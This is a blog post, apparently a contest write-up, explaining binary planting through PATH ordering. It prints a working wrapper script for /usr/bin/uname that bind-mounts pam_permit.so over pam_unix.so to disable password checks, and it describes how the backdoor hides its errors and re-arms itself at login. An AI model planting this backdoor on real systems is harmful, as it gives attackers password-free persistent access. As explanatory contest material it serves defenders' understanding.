[Hacking-Contest] Binary planting

Most Linux distributions have some kind of checksum support in the package manager which can be used to detect manipulations of existing programs in the filesystem. However, these checksums only verify the integrity of files which are legitimately shipped with a distribution package but they do not check whether an attacker has added additional files to the filesystem. This may look like a minor problem at first glance because the attacker can't add references to the additional files without manipulating existing files. However, when running a command e.g. from a shell script, the system will sequentially try to find the command in all the directories in the PATH environment variable. If there are two matching executables in two different PATH entries, the first one will be used without triggering any warning. So if we add a malicious binary in the first PATH entry while the legitimate one is somewhere later in PATH, the malicious binary is used instead of the original one. The same also applies to shared objects, which are loaded from various directories (LD_LIBRARY_PATH and the default directories /usr/lib and /lib).

For the Hacking Contest, we have used binary planting to install a small wrapper script for the uname program. In order to do so, we have created a shell script with the following contents in /usr/bin/uname:

mount --bind /lib/*/*/pam_permit.so /lib/*/*/pam_unix.so 2>/dev/null
/bin/uname $*

The script will try to use mount --bind to replace the pam_unix.so library with pam_permit.so. The effect of this manipulation is that password checking is disabled so that an attacker can log in locally or via ssh without or with an incorrect password. All errors of the mount command are ignored (sent to /dev/null) so that the script doesn't output any errors when running as a non-root user. After that, it calls the original uname program in /bin/uname so that the command still does the intended functionality.

Since /usr/bin is before /bin in the default PATH, any scripts calling uname will use the backdoored version instead of the original. Since some scripts executed during logout/login to the system use uname, the backdoored program will be run between the phases of the Hacking Contest, so that the backdoor is recreated between phase 2 and phase 3 even if the defenders have found and removed the additional mounts during phase 2.

The binary planting trick is obviously not limited to the uname binary. There are countless other commands which are routinely used in shell scripts and many of them can easily be used for a similar backdoor.

Leave a Reply

Your email address will not be published. Required fields are marked *